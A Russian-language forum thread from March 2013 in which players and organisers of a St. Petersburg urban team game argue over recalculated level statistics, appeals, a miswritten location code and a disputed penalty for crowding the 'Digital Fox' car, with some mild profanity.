Статистика по уровням (http://deadline.en.cx/GameStat.aspx?gid=41519)

Срок окончания приема апелляций - 19.03.2013 13:10

El Red
18-03-2013, 14:08
Чтобы избежать лишних вопросов: стата будет пересчитана в гуглдоке по времени получения и прохождения уровней

Jaguar
18-03-2013, 14:12
Чтобы избежать лишних вопросов: стата будет пересчитана в гуглдоке по времени получения и прохождения уровней

хорошо) тока думаю стоит убрать бонусы за опечатки при вводе;)

DEd_MONro
18-03-2013, 14:46
хорошо) тока думаю стоит убрать бонусы за опечатки при вводе;)

у кого такие имеются?

Jaguar
18-03-2013, 14:51
у кого такие имеются?

http://deadline.en.cx/GameBonusPenaltyTime.aspx?gid=41519&tid=126502&type=Bonus

prinncessa
18-03-2013, 14:55
http://deadline.en.cx/GameBonusPenaltyTime.aspx?gid=41519&tid=126502&type=Bonus
странное предложение, учитывая, что 10 минут невозможности ввода кода - вина организаторов. почему это время не должно быть компенсировано?

Jaguar
18-03-2013, 14:58
странное предложение, учитывая, что 10 минут невозможности ввода кода - вина организаторов. почему это время не должно быть компенсировано?

смотря какова ситуация была. Если им после первой попытки выдан ыбл замок и была возможность ввести верный код (без штрафа), а они опечатались, то простите это косяк команды.
Ежели ситуация была, что уже пошел штраф и они поняли что был неверный замок...тогда вопроса нет - компенсация!

Судя по описанию от организатора - похоже на первый вариант.

Fomka
18-03-2013, 15:14
Чтобы проще было пересчитывать:

Статистика, которая эта (http://deadline.en.cx/GameStat.aspx?gid=41519), суммирует реальные времена прохождения уровня, поэтому является правильной (с поправкой на то, что надо не учитывать сортировку по количеству взятых уровней, а смотреть только на суммарное время).

Статистика, которая эта (http://deadline.en.cx/GameWinners.aspx?gid=41519), не является правильной, потому что она прибавляет бонусы-штрафы ко времени завершения игры. А команды, не получавшие уровень 5, с точки зрения движка часть времени провели вообще "вне игры", и снятие уровней 5 и 6 в движке не компенсировало автоматическим бонусом выпавшее время.

Самый простой вариант пересчёта: добавить 4м командам, не получавшим уровень 5, бонус, равный разнице между временем завершения уровня 4 и временем завершения уровня 6. Тогда статистика в "ТОП10" станет правильной, и послужной список с очками будет начислен корректно.

mymy
18-03-2013, 15:15
Предварительные результаты (http://deadline.en.cx/GameWinners.aspx?gid=41519)
Как это (http://deadline.en.cx/GameWinners.aspx?gid=41519) может называться предварительными результатами, если таковыми оно не является? Поясните пжалуста.

Pukkaras
18-03-2013, 15:17
Всё верно.
Порой очень непросто натянуть сюжет на игровую схему, сохранив при этом соревновательность, равные условия и "изолированное" прохождение сюжета командами (что является необходимым условием равных условий).
Самой сюжетной игрой была провокация от ДРК и компании. Соревновательности и изолированности там и рядом не было, в итоге - всем второе место и 15 очков. Не скажу, что мне не понравилось, но, если бы все игры были такими, то дедлайна в его текущем виде, наверное, уже бы не было.
дану, и нормальные игры были с интересными сюжетами: нуар в первую очередь, скачок, трасса 60, пм наваждения. Не густо, конечно, что очень печально...

Ol4ik
18-03-2013, 15:30
дану, и нормальные игры были с интересными сюжетами: нуар в первую очередь, скачок, трасса 60, пм наваждения. Не густо, конечно, что очень печально...

а Марио? а Сталкер? и еще многа-многа? :blabla:

prinncessa
18-03-2013, 15:44
смотря какова ситуация была. Если им после первой попытки выдан ыбл замок и была возможность ввести верный код (без штрафа), а они опечатались, то простите это косяк команды.
Ежели ситуация была, что уже пошел штраф и они поняли что был неверный замок...тогда вопроса нет - компенсация!

Судя по описанию от организатора - похоже на первый вариант.

наверное две попытки ввода были даны не просто так. и раз одна была потрачена по вине организаторов, то компенсировано время должно быть.

McLuck
18-03-2013, 15:58
Тараканьи бега
Почему не проходил код cyp65(под лестницей) и что за неведомая херня была написана на арматурине?(типа аве859) В сумме протрачено 10 человеко\минут

Кюхель
18-03-2013, 16:41
Тараканьи бега
Почему не проходил код cyp65(под лестницей) и что за неведомая херня была написана на арматурине?(типа аве859) В сумме протрачено 10 человеко\минут


Это он 1045

Ух ты, как сурово присоединилось.-)

DrevoReZ
18-03-2013, 16:48
Тараканьи бега
Почему не проходил код cyp65(под лестницей) и что за неведомая херня была написана на арматурине?(типа аве859) В сумме протрачено 10 человеко\минут
аве829 проходил, тоже высматривали его тремя командами, плохо написан

Pukkaras
18-03-2013, 18:52
а Марио? а Сталкер? и еще многа-многа? :blabla:

Давай еще, не знаю о каких многа многа идет речь... да и в Марио была клева выдержана тематика, но не помню сюжета чет. И потом, упомянутые 5 игр - это игры за 3 года.

DEd_MONro
18-03-2013, 21:22
Кто бы что не говорил, но отменные тематичные игры квестового характера были - у ЗТ, У Фокса и у Теххи и Ко. Но уверен что мало кто кроме енщиков во все это играл.

Clinique
18-03-2013, 21:31
Тематические или сюжетные ?

Deneb
18-03-2013, 22:12
Кто бы что не говорил, но отменные тематичные игры квестового характера были - у ЗТ, У Фокса и у Теххи и Ко. Но уверен что мало кто кроме енщиков во все это играл.
Максимка и Крамакс играли Сталкера жи. Фомка полотна после игры строчил, например (http://dead-line.spb.ru/forum/showpost.php?p=187589&postcount=29). Раве опять же. Палтусятор, Клиникуэ.

DrK
18-03-2013, 22:19
Самой сюжетной игрой была провокация от ДРК и компании. Соревновательности и изолированности там и рядом не было, в итоге - всем второе место и 15 очков. Не скажу, что мне не понравилось, но, если бы все игры были такими, то дедлайна в его текущем виде, наверное, уже бы не было.
Здесь ты немножко смешал жанры RPG и квест.

9/11 - это скорее RPG, причем с нефиговой импровизацией (см. отчет как мы по ходу из обратной связи ветки придумывали). В RPG практически нет соревновательности в том виде, в котором она есть в DL (ту, т.е. не спорт совсем).

Квестов было несколько попыток: насколько я понимаю, оба МИБа и Нуар, как минимум. Может, еще чего забыл, сорри. За ДЛ1 не скажу, очень мало играл к стыду своему. Здесь самое сложное даже не изолированность, а устойчивость к отказам. Если в игре 10 изолированных уровней по 1.5 часа, то если косяк в одном - ну сняли его на худой конец и всё, дальше поехали. Если в игре 5 уровней по 3 часа (общее время вроде одно и то же, не так ли?), то косяк в одном ведет к снятию 20%(!) игры (привет вторая Фобия). Квест же в такой терминологии - один большой уровень, далее по аналогии (привет MiB-2).

Всё остальное - просто натягивание антуража на существующий метадвижок (задания, подсказки, коды). И неважно, каков формат по движку (штурм, линейка, нелинейка, подзоны всякие, формат WTF-TV, тридцать пять бонусных игр, и т.п.) - суть одна и та же. А антуражу можно на 10 рублей натянуть, а можно на 10к рублей, грубо говоря. Вот и вся разница.

Я не говорю, что что-то лучше, а что-то хуже. Каждому своё. Идея сделать чисто квестовое (или вообще АРГшное) направление в проекте есть, давно, и не у меня одного. Бог даст, запилим. :)

Deneb
18-03-2013, 23:33
у Дмитрия по всему форуму стоит оповещение на слово квест:D Видимо как у Павла на слово Метро.:rolleyes:

Метро Метро.

YaWeR
18-03-2013, 23:38
дану, и нормальные игры были с интересными сюжетами: нуар в первую очередь, скачок, трасса 60, пм наваждения. Не густо, конечно, что очень печально...

А как же сюжет Сокровища нации от ФрЭша?=)

Effa
18-03-2013, 23:58
Кто бы что не говорил, но отменные тематичные игры квестового характера были - у ЗТ, У Фокса и у Теххи и Ко. Но уверен что мало кто кроме енщиков во все это играл.
Catch the Rainbow был эпичный квест же. Я только через три дня после закрытия игры поняла, какой там был сюжет и что с чем связывалось.

При этом я была автором.

Heckfy
19-03-2013, 00:09
Я играл?

sinner
19-03-2013, 00:20
у Дмитрия по всему форуму стоит оповещение на слово квест:D Видимо как у Павла на слово Метро.:rolleyes:

Метро Метро.

фильм клевый,да...
я вот кстати в теме об сабже высказал свою любовь и успокоился,а ты в Венгрии походу вид на жительство получил.здесь (http://www.altermed.ru/node/245)от этого,согласно тырнетам,недорого и безболененно лечат.

Pukkaras
19-03-2013, 00:27
МиБ вспомнили... ну писец господа, еще давайте ПМ от КО 5летней давности вспомним. Речь о том, что банально игр пусть даже с линейным сюжетом, а не натянутой тематикой/фильмом/книгой итп очень мало в проекте, такие игры редки, вот ребята недавно начавшие играть это заметили и я думаю, что это очень хорошее замечание! Действительно хотелось бы больше сюжетных игр.

DEd_MONro
19-03-2013, 00:29
Catch the Rainbow был эпичный квест же. Я только через три дня после закрытия игры поняла, какой там был сюжет и что с чем связывалось.

При этом я была автором.

ну это был скорее для меня текстовый квест ака "космические рейнджеры"

ВарENик
19-03-2013, 01:13
Хм... видимо не в ту тему зашла, думала тут одноэкипажку последнюю обсуждают... Ну ладно...

Jaguar
19-03-2013, 01:16
все ждут стату)

Punch
19-03-2013, 03:18
МиБ вспомнили... ну писец господа, еще давайте ПМ от КО 5летней давности вспомним. Речь о том, что банально игр пусть даже с линейным сюжетом, а не натянутой тематикой/фильмом/книгой итп очень мало в проекте, такие игры редки, вот ребята недавно начавшие играть это заметили и я думаю, что это очень хорошее замечание! Действительно хотелось бы больше сюжетных игр.

Ну были 2 сюжетные игры в прошлом сезоне от нас... практика показала, что такие игры игрокам неинтересны.

S3T
19-03-2013, 03:54
Хм... видимо не в ту тему зашла, думала тут одноэкипажку последнюю обсуждают... Ну ладно...

+100500

Clinique
19-03-2013, 10:33
Ну были 2 сюжетные игры в прошлом сезоне от нас... практика показала, что такие игры игрокам неинтересны.

Ты его не переубедишь =)

RAVE
19-03-2013, 10:59
Ну были 2 сюжетные игры в прошлом сезоне от нас... практика показала, что такие игры игрокам неинтересны.

Слава, они были шикарны!
Естественно, не более чем личное мнение.

Ol4ik
19-03-2013, 11:05
Ты его не переубедишь =)

и не надо :) у каждого свое мнение о лучшей игре :) и том, что интересно ))

Batleby
19-03-2013, 11:26
А много ли у нас полевиков следящих за сюжетной линией во время игры? Давно задаюсь этим вопросом, хочу статистику))

dab
19-03-2013, 11:28
А много ли у нас полевиков следящих за сюжетной линией во время игры? Давно задаюсь этим вопросом, хочу статистику))
на MIB2 следили усиленно, координируя все остальное поле
больше в сюжетные игры не играл

DashИК
19-03-2013, 11:34
А много ли у нас полевиков следящих за сюжетной линией во время игры? Давно задаюсь этим вопросом, хочу статистику))

В ДЛ.1 обязательно слежу за сюжетом, если это действительно сюжет, а не набор букв перед заданием.
В ДЛе только на играх, где для прохождения требуется понимать, что, собственно, происходит - квесты, нестандарты и т.д.
Я раньше вообще не понимала, как можно делать бессюжетные игры, но теперь поняла, что можно и даже нужно. Тот же КНД - офигенна, хотя и бессюжетна.
По мне, чем больше разнообразных форматов, тем веселее.

Jaguar
19-03-2013, 11:37
я правильно понимаю, что в 13.10 елси не было больше Эпиляций (новое слово), то будет стата?

Clinique
19-03-2013, 11:47
и не надо :) у каждого свое мнение о лучшей игре :) и том, что интересно ))

Может уже пора понять что деда мороза нет ? так или иначе все эти квесты и сюжеты не более чем обертка, поиску и беготне. Если задания сами по себе увлекают на локе, будь то поиск, полелогика или полештабологика. Царь в халате мне не обязателен, как и писанина связующая все это по давно знакомому сюжету фильма.

Pukkaras
19-03-2013, 11:50
А много ли у нас полевиков следящих за сюжетной линией во время игры? Давно задаюсь этим вопросом, хочу статистику))
Насколько игроки будут следить за сюжетом в большей степени зависит от авторов, от того как они оформят уровни, задания, как привяжут задания в поле к сюжету итп.
Вот, например, на метро был сюжет протянутый через всю игру, но был лишь описан в легендах, уровни почти ни как не были привязаны к нему. Тоже самое можно сказать про трассу 60. Скачок для полевиков по сути сводился к сбору стафа.
Сильнее всего сюжет и полевые задания были сплетены на МиБ, Нуаре. 9/11 в счет не берем, как и МиБ2 , так как там игры недоделаны были(всем 3е место поцаны), но сюжет был отлично протянут через всю игру.

Jaguar
19-03-2013, 11:52
может хватит тут? делайте игры посоны;)

Clinique
19-03-2013, 11:57
может хватит тут? делайте игры посоны;)

Делаем делаем =) Очередную лютую треньку в ебенях на 12 часов для лидера )

Punch
19-03-2013, 12:06
Насколько игроки будут следить за сюжетом в большей степени зависит от авторов, от того как они оформят уровни, задания, как привяжут задания в поле к сюжету итп.
Вот, например, на метро был сюжет протянутый через всю игру, но был лишь описан в легендах, уровни почти ни как не были привязаны к нему. Тоже самое можно сказать про трассу 60. Скачок для полевиков по сути сводился к сбору стафа.
Сильнее всего сюжет и полевые задания были сплетены на МиБ, Нуаре. 9/11 в счет не берем, как и МиБ2 , так как там игры недоделаны были(всем 3е место поцаны), но сюжет был отлично протянут через всю игру.

Миша, перечитай сценарий Трассы))
И да, согласен, иногда орги делают настолько простые загадки, что не остается времени почитать и погрозиться в сюжет.

А так стараюсь следить за сюжетом, перфаками, ибо кодюли я и так уже видел мульон и как-то уже не впечатляют)))

Sgushchenka
19-03-2013, 12:42
[...]

Pukkaras
19-03-2013, 12:46
Чет АД какой то сейчас в стате.. Не понятно куда смотреть ваще.

Товарищи организаторы, вы когда там закончите адить движок, пожалуйста, подробно отпишитесь на форуме по всем исправлениям, бонусам/штрафам , решения по аппеляциям .

Jaguar
19-03-2013, 13:10
Срок окончания приема апелляций - 19.03.2013 13:10

:cool:

dab
19-03-2013, 13:14
:cool:
хронограф :D

CinderellA
19-03-2013, 13:15
Срок окончания приема апелляций - 19.03.2013 13:10

:cool:
Апелляции больше не принимаются.

dab
19-03-2013, 13:15
когда стата устаканится?

Shifer23
19-03-2013, 13:19
Считаю, что косячность уровня с лисой стоила нам победы. По логике взятия уровня из движка, то, что код на флаге, нужно было узнать прочтя семафорную азбуку, что мы честно пытались сделать минут 30. Но ни на одном из записанных нами четырех видео,"СМФЛАГ" не получался. Есть хоть кто-то кто прочел "СМФЛАГ"?

CinderellA
19-03-2013, 13:21
Считаю, что косячность уровня с лисой стоила нам победы. По логике взятия уровня из движка, то, что код на флаге, нужно было узнать прочтя семафорную азбуку, что мы честно пытались сделать минут 30. Но ни на одном из записанных нами четырех видео,"СМФЛАГ" не получался.
Все были в равных условиях. Все курили семафорную азбуку.

Есть хоть кто-то кто прочел "СМФЛАГ"?
Таковых нет. Это видно по мониторингу.

KoIIIaK
19-03-2013, 13:24
11 РАСЧЛЕНЁНКА ([GroM]) н смфлцг 16.03.2013 01:28:55.520
вот кто почти добился результата

El Red
19-03-2013, 13:43
Статистика пересчитана и откорректирована, поступившие апелляции рассмотрены.

С учетом всех апелляций, бонусов, штрафов и компенсаций итоговое распределение мест выглядит так:

#1 Команда придурков, блеать!
#2 Futurama SPb Team
#3 Бaбники
#4 Пакмэн
#5 РАСЧЛЕНЁНКА
#6 СПГ
#7 VКХ
#8 psychos
#9 Люди_X
#10 Пешеезды
#11 764
#12 Якорьвзад

Итоговая статистика (http://deadline.en.cx/GameWinners.aspx?gid=41519)
Пересчет статистики по уровням с учетом бонусов и штрафов (http://docs.google.com/spreadsheet/pub?key=0Anz15Hb-Em9KdHpPNVhiZ0xpSjE4R1RfVmM2bWdPMkE&gid=1)
Апелляции и ответы на них (http://docs.google.com/spreadsheet/pub?key=0Anz15Hb-Em9KdHpPNVhiZ0xpSjE4R1RfVmM2bWdPMkE&gid=0)

У вас есть время до 22:00 на поиск фактических ошибок в расчетах и на исправление составов в движке. После этого времени игра будет закрыта.

CinderellA
19-03-2013, 14:15
Всем спасибо за игру!

Спасибо всем, кто играл в эту игру_на_отъе*ись!
Спасибо за отзывы: большое спасибо за положительные, огромное спасибо за адекватные отрицательные, чуть меньшее спасибо за неадекватно высказанные отрицательные отзывы)
От лица организаторов я приношу извинения за все запланированные и незапланированные косяки, возникшие как по желанию и вине организаторов, так и за те, которых мы не ожидали!

Окончание приёма оценок (http://dead-line.spb.ru/forum/showthread.php?t=6013): воскресенье 24 марта, 22:00.

Для вас старались(пусть и на отъе*ись):

El Red
Tvaruga
Сinderella
simple
yohanson
Like a Wind
good_marcha
DrDim777


До новых встреч! ;)

Тэ.
19-03-2013, 20:08
Вот не хотела выносить эту грязь на форум, однако:
Уровень пиздеца в этой игре просто зашкаливает. МиБ и Морозная свежесть нервно курят. Неужели из всех авторов ни один не умеет работать с движком? Я смотрю стату, штрафы/бонусы и сценарий и не могу сдержать кровотечения из глаз. Ваши комментарии в стиле "я не виноват", "почему-то так получилось", "внезапно обнаружилось" и т.п. выглядят ничтожно жалко. Да, просрочка, но вы же знали, на что шли? Ладно, это лирика, все косяки и так известны. Теперь про код пря187 (182). Крамакс звонил Синди и сообщал, что код не проходит.
"Предупреждаем команду СПГ о недопустимости исправления кодов на локации, при том, что санкции оргов на это не было. Даже если код написан неправильно." - вы не охуели ли? Макс сказал Синди, мол, исправить код? Она сказала "ага" и бросила трубку. Спасибо надо говорить за исправление ваших косяков, а не предупреждалки предупреждать.
Теперь про лису. По-тихому запилили штраф и думаете прокатит? Футурама каталась за лисой уже 20 минут, как мы вышли на уровень. Мы мешали Аспирину приблизиться к ней? Аспирину? Кагбе самим-то не смешно? Мы мешали оргам перестроиться в средний ряд? Это вы уже на ходу придумали? И что ж тогда поворотник не включали? Пакмен подхватил лису, когда мы уже крутанулись с ней один круг, они ехали справа от нас, обгоняли, и флажок читался прекрасно. Почему мы продолжали ехать за лисой, закрыв уровень, мы подробно написали в апелляции. Что ж вы эту информацию-то на всеобщее обозрение не выставили?
Требую удалить все компрометирующие посты из сценария и выдуманные штрафы, ибо рассматриваю их, как личное оскорбление. Мы всегда играли и будем играть честно.
Спасибо за игру.

McLuck
19-03-2013, 20:31
Все были в равных условиях. Все курили семафорную азбуку.

Команда Пешеезды не курила эту азбуку. Флажки(ок) самостоятельно вылезли из машины

Punch
19-03-2013, 21:18
Команда Пешеезды не курила эту азбуку. Флажки(ок) самостоятельно вылезли из машины

Читеры:D:D:D
Даже я успел открыть страницу с семафорной азбукой)))

Goy
19-03-2013, 21:25
Очень жаль, что хорошие впечатления от игры были напрочь убиты подковерными интригами. Все как всегда (http://enbash.org.ru/id2466).

CinderellA
19-03-2013, 22:23
#1 Команда придурков, блеать!
#2 Futurama SPb Team
#3 Бaбники
#4 Пакмэн
#5 РАСЧЛЕНЁНКА
#6 СПГ
#7 VКХ
#8 psychos
#9 Люди_X
#10 Пешеезды
#11 764
#12 Якорьвзад


Статистика окончательная!
Команду придурков, блеать! с победой!

Punch
19-03-2013, 22:46
Статистика окончательная!
Команду придурков, блеать! с победой!

Блеать, спасибо!:D

P.S. И от меня спасибо AlexM за название команды))

S3T
19-03-2013, 23:08
Читеры:D:D:D
Даже я успел открыть страницу с семафорной азбукой)))

мы тоже азбуку не курили, просто я быстро нагнал лису справа :D

Laww
19-03-2013, 23:23
А можно почитать показания агентов на уровне "Digital Fox" по поводу инцидента, произошедшего с командами СПГ, Футурама и Пакмэн? Спасибо!

AspiRiN
19-03-2013, 23:27
Йобаныйврот! Почему, почему мы вторую игру подряд тупим на тех уровнях, на которых больше никто не тупит?!!!?!??! FUUUUUUUCK!!!

Пы. Сы. Игра ок! Програмерские фичи, формулы и косяки - бяка, динамика и другие задумки - отлично!

По лисе. Я сам для себя так и не понял, тупили ли мы или уровень косячный, или просто мы пытались его взять по правилам, а остальные забили на них или просто всем остальным повезло, а нам нет.
В общем снял код, когда поравнялся с оргами, чтобы сказать, какие они криворукие и что показывают азбуку каждый раз по разному =)

Кстати если в комментах написано, что в семафорной азбуке было написано СМФЛАГ, после чего нужно было приблизится к лисе и прочитать надпись на флаге, то имею мнение, что азбуку, а следовательно и порядок взятия уровня, не выкурил никто. =)

Парампампам.

Квест. Метро. Посоны.

McLuck
19-03-2013, 23:31
Читеры:D:D:D
Даже я успел открыть страницу с семафорной азбукой)))

нам как аутсайдерам,видимо, подогнали халвы)

Laww
19-03-2013, 23:31
Валера, тебе Макс мешал на лисе? Мешала ли команда СПГ вам при взятии уровня?

CraMax
19-03-2013, 23:47
Йобаныйврот!
В общем снял код, когда поравнялся с оргами, чтобы сказать, какие они криворукие и что показывают азбуку каждый раз по разному =)


Мы не поняв ни одной буквы, тоже сравнялись с оргами чтоб сказать им тоже самое, и сняли код так же. Т.е. в принципе можно было не читать символы, а сразу брать с флажка.

Уважаемые организаторы, а чем обоснована цифра штрафа в 30 минут? на 4 часовой игре!!! Почему не 2 мин. 53 сек. которые мы "мешали" Пакману и Футураме? Почему не 2 часа? А почему вообще не дисквалифицировать команду за "грубое" нарушение правил проекта? Да и вообще какое правило было нарушено? можно развернутый ответ по данному штрафу? Можно вообще какой-нибудь ответ?

CinderellA
19-03-2013, 23:54
Апелляции и ответы на них (http://docs.google.com/spreadsheet/pub?key=0Anz15Hb-Em9KdHpPNVhiZ0xpSjE4R1RfVmM2bWdPMkE&gid=0)

Текст апелляций, а так же решения по ним всё ещё доступны по ссылке.
Ссылка на данный документ присутствует в первом посте.

Velkopiterskij
20-03-2013, 00:09
Мы не поняв ни одной буквы, тоже сравнялись с оргами чтоб сказать им тоже самое, и сняли код так же. Т.е. в принципе можно было не читать символы, а сразу брать с флажка.

Уважаемые организаторы, а чем обоснована цифра штрафа в 30 минут? на 4 часовой игре!!! Почему не 2 мин. 53 сек. которые мы "мешали" Пакману и Футураме? Почему не 2 часа? А почему вообще не дисквалифицировать команду за "грубое" нарушение правил проекта? Да и вообще какое правило было нарушено? можно развернутый ответ по данному штрафу? Можно вообще какой-нибудь ответ?

Макс, какое именно правило я писал в посте в этой же теме. При том в тот момент не было уверенности в том, чтобы писать апелляцию. Однако всё, что я прочитал в ответ от команды СПГ это только пост Моноро о том, что на лисе "было весело". Что мешало вам ответить в этой же теме на мой пост? Что мешает сейчас всем на форуме объяснить своё поведение?
Апелляция написана исключительно потому, что есть факт нарушения правил проекта и по нему должны быть санкции. К сожалению в правилах размер санкций не указан, так что он остаётся на усмотрение организаторов.

DEd_MONro
20-03-2013, 00:42
Вот Валера в своем посте четко дал понять, что мы ну никак им не мешали. Хотяяяя....

После это фразы - "Предупреждаем команду СПГ о недопустимости исправления кодов на локации, при том, что санкции оргов на это не было. Даже если код написан неправильно." все уже стало ясно.

Potaki
20-03-2013, 01:20
а поясните снятие веревочного дестроя. че то я пропустил это.

Pukkaras
20-03-2013, 08:15
а поясните снятие веревочного дестроя. че то я пропустил это.
Вась, в документе обоснование есть, я бы написал причину вкратце сам, но лучше прочесть формулировку оргов.

По инциденту с лисой все достаточно однозначно же.
1) Орги должны задать вопрос водителю футурамы, мешала ли ему команда СПГ проходить уровень.
2) Показания агентов на лисе, тобишь считают ли они, что правила были нарушены и СПГ реально мешали прохождению.

че тут мусолить то я не знаю. По идее орги должны были опросить именно выше указанных людей прежде чем вынести решение.

Velkopiterskij
20-03-2013, 08:54
Вась, в документе обоснование есть, я бы написал причину вкратце сам, но лучше прочесть формулировку оргов.

По инциденту с лисой все достаточно однозначно же.
1) Орги должны задать вопрос водителю футурамы, мешала ли ему команда СПГ проходить уровень.
2) Показания агентов на лисе, тобишь считают ли они, что правила были нарушены и СПГ реально мешали прохождению.

че тут мусолить то я не знаю. По идее орги должны были опросить именно выше указанных людей прежде чем вынести решение.

Миша, то есть того факта, что они мешали нам не достаточно?

Тэ.
20-03-2013, 09:32
Что значит мешали? Три команды одновременно проходят уровень. Три машины едут за лисой. А когда на КО3-шку очередь стоит - это тоже одна команда мешает другой? Что за бред ты несешь? Давайте теперь стоп-таймы у каждой кодюли делать и огентов ставить, чтоб следили. А то вдруг мне кто помешает фонариком в дырку какую посветить.

mymy
20-03-2013, 09:44
Три команды одновременно проходят уровень.
На момент нашего нахождения радом с лисой вы уровень уже закрыли.

Tatyan-ka
20-03-2013, 09:46
Что значит мешали? Три команды одновременно проходят уровень. Три машины едут за лисой. А когда на КО3-шку очередь стоит - это тоже одна команда мешает другой? Что за бред ты несешь? Давайте теперь стоп-таймы у каждой кодюли делать и огентов ставить, чтоб следили. А то вдруг мне кто помешает фонариком в дырку какую посветить.
Аня, если такое произойдет, будем херачить апелляции а-ля
просим начислить дисциплинарный штраф команде *** за поведение на уровне *** равный штрафу за слив данного уровня. и пусть все сливают...

Дед
20-03-2013, 09:52
Даааа, мало комментирую, но в этот раз надо!!! Игра ни че так была, несмотря на косяки. Уровень лиса норм, Пэкману надо штраф влупить, потому что он поровнявшись с сидом и с лисой прочитав код, начал вытеснять сид, тем самы не только нарушил правила проекта, но и создал угрозу жизни экипажу сида, последовала нормальная реакция Карамакса сделать так же. Че не нравится???!!!!! По поводу исправления кода, стоял в метре от Макса, когда он общался с Синди, она попросила исправить Макс полез это делать, Теххи спросила зачем он это делает, последовал ответ: "Синди попросила". В это время рядом находились конкуренты, которым спалили код, да еще и исправили, они весь диалог слышали. То же не вижу актуальности притензй.

Тэ.
20-03-2013, 10:02
На момент нашего нахождения радом с лисой вы уровень уже закрыли.
Только тогда мы об этом еще не знали. Ну какой нам смысл терять время на предыдущем уровне, когда уже можно ехать на новый?

mymy
20-03-2013, 10:06
Только тогда мы об этом еще не знали. Ну какой нам смысл терять время на предыдущем уровне, когда уже можно ехать на новый?
Опишите пожалуйста вашу официальную версию произошедшего. Об этом вас просили уже давно.

Deneb
20-03-2013, 10:07
скажите посоны, а у всех волшество с составами случилось? у нас половина игроков из состава игравших вылетело. И игра закрыта. Хекфу говорит что никого не выпиливал. Значит либо колдунство, либо орги. Назревает вопрос. Какого хуя?

Grom
20-03-2013, 10:23
Борьба за очки уже в начале сезона! А была бы тренька на 10часов и разрывы в час, так никаких претензий бы не нашлось :)))

Rada
20-03-2013, 10:25
скажите посоны, а у всех волшество с составами случилось? у нас половина игроков из состава игравших вылетело. И игра закрыта. Хекфу говорит что никого не выпиливал. Значит либо колдунство, либо орги. Назревает вопрос. Какого хуя?

вот оргам делать нечего, как людей из составов выпиливать, я думаю, можно попросить игру открыть и составы поправить.

CraMax
20-03-2013, 10:25
Вот что я написал Элреду в личку:
"Мы когда увидели код, вбили его, и у нас вылетел интернет, мы не могли понять закрыли уровень или нет. В этот момент подъехала команда пакмен, обогнали и вырезали нас. Отпускать лису не удостоверевшись во взятии уровня - мы не хотели. Поэтому продолжали двигаться за лисой. Обогнали Пакмена, и стали ждать пока покажут флажок снова. Я считаю что ни кому из команд мы не мешали взять лису."

Endo
20-03-2013, 10:28
горячо тут у вас:)

DEd_MONro
20-03-2013, 10:42
http://www.dzzzr.ru/forum/showthread.php?p=4281862#post4281862

Grom
20-03-2013, 10:47
DeadlineLeaks надо открывать...

El Red
20-03-2013, 11:55
Про лису.

Конечно мы опросили все вовлеченные команды и агентов на лисе. Позиции такие:

СПГ (Крамакс): отвалился интернет, не могли понять, прошел ли код, вот и ехали за лисой.
Пакмэн (Муму): СПГ ехали рядом с лисой, мешались, но код взять удалось из 3 ряда. Взяли - и уехали, СПГ и Футурама поехали дальше.
Футурама (Кошак): СПГ ехали рядом с лисой долго, мешали в течение 10 минут.

Учитывая, что между взятием СПГ лисы и отъездом Пакмэна прошло 3 минуты, СПГ ехали рядом с лисой явно больше 3 минут (с момента взятия до отъезда Пакмэна плюс еще какое-то время). Вряд ли все кошаковские 10 минут пришлись на этот период, поэтому можно считать, что СПГ ехали рядом с лисой больше 3 и меньше 10 минут.

В КЦ у СПГ были 5 человек (10 человек состава на игре, из которых 5 в машине, верно?), плюс в поле наверняка было не одно устройство с доступом к движку (например, на уровне 9 коды из поля вбивали Крамакс и Тэххи). Учитывая это, трудно поверить в то, команда дольше 3 минут не могла удостовериться в том, что она перешла на следующий уровень.

Эти доводы орги сочли достаточными, чтобы признать умышленность действий команды СПГ, и признать факт нарушения командой СПГ пункта следующего правил:
3.4.2. Игрокам запрещается умышленно усложнять либо просто изменять условия взятия уровня для других команд. <...>

Тогда в соответствии с пунктом 3.4.11 ("За нарушение пунктов 3.4.2 - 3.4.10 организатор имеет право наказать виновную команду дисциплинарным штрафом.") было решено назначить команде СПГ дисциплинарный штраф.

В Правилах не указаны размеры дисциплинарных штрафов, но очевидно, что наказание должно быть таким, чтобы отбить охоту к подобным нарушениям у виновника и окружающих. Штраф размером в пять минут вряд ли кого-то убедит, верно? Если за кражу давать 15 суток, желающий что-то украсть не побоится наказания. А если за это светит 3 года - то заставит задуматься.
Поэтому размен штрафа выбран существенным, но не фатальным. Желающие могут подискутировать на тему того, как следует выбирать размеры дисциплинарных штрафов, и это будет полезно будущим оргам, но на результаты этой игры уже ничего повлиять не сможет.


Про код "пря 187(2)".

Во-первых, спасибо команде СПГ за исправление кода, который действительно был написан неверно (после игры посмотрели фотки, на локе писали 187, в движок вбили 182). Это избавило последующие команды от проблемы, с которой столкнулись вы.
Но Синди утверждает, что не давала своего согласия на исправление кода, так как считала, что проблема не в том, как он написан, а во том, как его читает СПГ. Иначе зачем просить команду исправлять код на локации, когда проще самим исправить его в движке.
Я не верю в амнезию Синди и не верю в хитрый план Крамакса по тайному исправлению орговских косяков. Скорее всего, имело место взаимное недопонимание говоривших по телефону. Либо кто-то чего-то не услышал, либо кто-то кого-то не так понял.
Ребята, извините, что накатили на вас бочку по поводу исправления кода.


Про составы.

Оргам действительно нет никакого смысла исправлять чьи-то составы. Вчера специально давалось время до вечера на их редактирование. Если кто-то не успел запилить-выпилить кого-то - напишите в личку, я поправлю.

CraMax
20-03-2013, 12:03
Кошак вечером напишет, что мы им не мешали.

В авто было еще 2 устройства, на которых можно было посмотреть движок. У меня и у Теххи. Я рулил, и не мог отвлекаться на телефон. Теххи в это время звонила в штаб, но дозвонилась не с первого раза.

Jaguar
20-03-2013, 12:05
а вот у меня так, вопрос со стороны: почему лиса ехала в левой полосе, при 3-х полосах?

Heckfy
20-03-2013, 12:24
Да вы не правы, господа орги. Ситуация выглядит таким образом - я повыпиливал людей из команды, а теперь им пижжю, что я этого не делал. Я знаю, что составы я не трогал, такое возникло из-за ваших диках манипуляций с движком я уверен чуть более, чем полностью.

CinderellA
20-03-2013, 12:27
не известно было когда вы закроете игру - об этом ничего не писалось, если я не ошибаюсь...

У вас есть время до 22:00 на поиск фактических ошибок в расчетах и на исправление составов в движке. После этого времени игра будет закрыта.

Про составы.

Оргам действительно нет никакого смысла исправлять чьи-то составы. Вчера специально давалось время до вечера на их редактирование. Если кто-то не успел запилить-выпилить кого-то - напишите в личку, я поправлю.

Мы никому не враги.

Heckfy
20-03-2013, 12:33
